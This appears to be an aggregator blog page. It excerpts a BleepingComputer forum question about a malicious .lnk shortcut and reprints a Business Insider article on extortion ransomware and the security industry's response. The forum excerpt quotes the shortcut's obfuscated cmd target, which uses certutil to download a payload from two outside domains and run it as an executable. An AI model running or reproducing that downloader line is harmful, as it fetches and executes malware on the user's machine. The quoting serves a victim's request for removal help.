Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Cybersecurity is changing to address high-profile ransomware attacks - Business Insider

Cybersecurity is changing to address high-profile ransomware attacks - Business Insider


Cybersecurity is changing to address high-profile ransomware attacks - Business Insider

Posted: 16 May 2020 12:00 AM PDT

  • Extortion ransomware is the high-profile leaking of stolen documents pressuring victims to pay to get them returned. 
  • Leaking of Lady Gaga's documents this week – coupled with a dump on Saturday of legal documents mentioning President Trump – raise the profile of a crime spree reshaping the cybersecurity industry. 
  • Startups including $1 billion KnowBe4, which pulled in a $300 million investment in June, are offering training and data backup to address ransomware
  • Older companies like Kaspersky and Sophos have upgraded their enterprise tools and led new efforts to address the threat.   
  • Visit Business Insider's homepage for more stories.

A cybergang hacked into top entertainment law firm Grubman Shire Meiselas & Sacks this week and spilled confidential documents related to two of the most famous people in the world, taking the high-profile cybercrime of ransomware to its brightest spotlight yet – and challenging the cybersecurity industry.

On Thursday the gang dumped thousands of pop superstar Lady Gaga's contracts and financial records, exposing confidential data ranging from her dancers' Social Security numbers to how much she charged for a private concert. On Saturday the hackers dumped hundreds of the law firm's emails and documents that mention President Trump, claiming the documents were "the first part, with the most harmless information," and more data dumps are to come.   

The attack on the law firm, which confirmed the hack in a statement and said it would not pay the ransom, is the latest in a string of cybertattacks coupled with highly publicized blackmail that challenge the cybersecurity industry, pushing traditional companies to produce new enterprise products, and startups to innovate with artificial intelligence and other new approaches. 

Ransomware attacks are both one of the most common and most costly cybercrimes: Three-quarters of a million ransomware attacks happened last year, with an average cost of nearly $1.4 million when victims pay, researchers say. These attacks have hit cities, hospitals, Fortune 500 firms, and now, via the law firm hack, pop stars.  

"Old approaches to extortion ransomware don't work," says threat analyst Brett Callow of the New Zealand firm Emsisoft, which specializes in ransomware defense and recovery. "Data exfiltration has completely changed the landscape, with companies' data being weaponized and used against them. Criminals have turned up the heat, and threats keep advancing."

It's not just the threat of having personal or professional secrets exposed, either. Sean Gallagher, a researcher at cybersecurity firm Sophos, notes that these kinds of attacks leave companies exposed to fines under Europe's General Data Protection Regulation (GDPR), which can cost firms that experience data breaches up to 4% of their annual revenue. "These can be business-ending attacks," Gallagher said. 

How ransomware works

Attacks often begin with an email. An employee clicks on a link or downloads an attachment, and unwittingly unlocks ransomware that spreads throughout a company's network. The malware encrypts the organization's data, often paralyzing its online operations. 

A panicked victim is then presented with a dilemma: Pay a ransom in bitcoin and receive a "key" to supposedly release your data – or refuse to pay, and languish as the data remains locked up. The keys often don't work, or don't work well. So payment doesn't free the victim, but does embolden the captor, experts say. Still, victims on the spot often pay – more than a quarter of the time, new research shows. When their documents are publicly leaked, the pressure mounts considerably. 

Research from Sophos shows that over half the companies in many industries have been hit by this crime in the last year or so:

Sophos research graphic
Sophos research shows which industries were hit hardest by ransomware last year.
Sophos

Kaspersky Lab, the major Russian cybersecurity company, offers advice to stop ransomware that can be summed up as: Never click on unverified links or download untrusted attachments, make sure you have current data backups close at hand, and install the latest security patches for your operating system. And if you or your company are hit, never pay the ransom — report the crime to your local law enforcement agency or the FBI, instead. Many victims don't do this, because their attackers threaten them. This encourages more ransomware attacks and makes prosecution of criminals extremely difficult. 

A new push to stop ransomware

Big security companies in the past classified ransomware with other forms of malware that they argued could be stopped with their existing antivirus, network security (which cover shared company assets), and endpoint products (which cover employees' devices). That hasn't proven to be the case, though, as it's become clear that ransomware requires a different approach.

Today McAfee, Trend Micro, Bitdefender, Avast, and others have products specifically designed to address ransomware, and some of them provide services to victims after an attack, by trying to decrypt their data and free their systems.  

A few companies have done more. Kaspersky Lab, which sells enterprise tools to block ransomware, has emerged as one of the new leaders in the fight against ransomware by leading an industry coalition that gives companies free tools to unlock computer systems criminals have seized. Sophos, which offers an artificial-intelligence product called Intercept X, that automatically detects new strains of ransomware, produced a report on ransomware last week that polled 5,000 security professionals in 26 countries.    

And the quirky 40-employee New Zealand firm Emsisoft, a private company founded in 2003, has specialized in ransomware for years, providing many free decryption tools – and boasting a genius cryptographer in hiding from the criminals he frustrated so many times they threaten his life. Callow, the threat researcher quoted above, and the rest of Emsisoft also tirelessly preach that companies must practice good security hygiene to defend against attacks.  

Fighting back provides investment opportunity

The rise in ransomware has led to opportunity for more niche players to enter the ring, too.

For instance, research shows around half of employees don't know how to handle the sudden computer system paralysis and ominous threats of a ransomware attack, and ransomware training is a booming industry.

Florida unicorn startup KnowBe4, which pulled in a $300 million investment in June to take its valuation over $1 billion, offers 18 different ransomware simulations to its customers. Similarly, SiteLock, a startup acquired by the ABRY Partners private equity firm in 2018, offers ransomware training for remote employees

Data recovery, which allows organizations hit with ransomware to activate backup copies of their files and carry on operations, is a key area of defense – and an investing opportunity. "I do tend to view recovery as an opportunity for innovation," says Josh Zelonis, a principal analyst at Forrester who focuses on cybersecurity. "I also know a lot of backup vendors are hungry to get into this space."

Fast-growing 10-year-old San Francisco startup Scality, which provides data recovery for ransomware attacks, has raised more than $150 million in venture capital from investors including Menlo Ventures. Silicon Valley competitor Cloudian has raised around $175 million, including a $94 million round a year ago.  

Cybereason, a Boston startup that brought in $200 million in funding from Japan's SoftBank in August, detects ransomware and blocks attempts to encrypt files. ITsMine, an Israeli startup, automatically protects a company's data from external threats without interrupting workers. Deep Instinct, a New York startup that raised $43 million in February, uses deep learning and predictive analytics – artificial intelligence that learns how threats evolve and anticipates changes – to prevent ransomware from executing. 

Celebrity attack raises awareness of crime to new heights

For as much as the cybersecurity companies are hustling to defend against ransomware, the bad guys aren't sleeping, either.

It seems likely that ransomware gangs will present the same kind of threat as bank robbers during the 1930s, when Bonnie and Clyde, Pretty Boy Floyd, and Baby Face Nelson made headlines and newsreels with their latest exploits. The ransomware gangs Maze, REvil (who carried out the celebrity hack), Doppelpaymer and others are chasing the same kind of brazen notoriety by publicly leaking documents and taunting targets, who now include the president. 

The leaked documents published by ransomware gangs can be startling. There is currently a document posted on one of the ransomware gangs' websites that documents sites of weapons of mass destruction, with a maintenance schedule. Past leaked documents have included a missile schematic, fundraising letters from President Trump, and the names and contact information for sufferers of eating disorders. The more delicate the information, the more pressure on victims to pay up fast, Emsisoft wrote in a December State of Ransomware report.

But this celebrity hack shows how these criminals are going after ever-larger game — and building themselves pop star-sized reputations, too. The documents will doubtlessly continue to draw attention until the situation is resolved, experts say. 

Rolling Stone and other publications reported that the law firm said in a statement "Cyberterrorists have hacked into our network and are demanding $42 million as ransom. We are working directly with federal law enforcement." The statement suggested the law firm would not pay, so the document leaks of the famous clients' data could continue. "We have been informed by the experts and the FBI that negotiating with or paying ransom to terrorists is a violation of federal criminal law." The White House and Lady Gaga's representation did not immediately respond to a request for comment. 

The celebrity hack turns up the heat on victims and promotes the criminals' reputation, experts said.  

"Hacking something everyday people have an interest in helps criminals get the word out to a wide audience that they are not to be messed with," says Chester Wisniewski, principal research scientist at Sophos.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US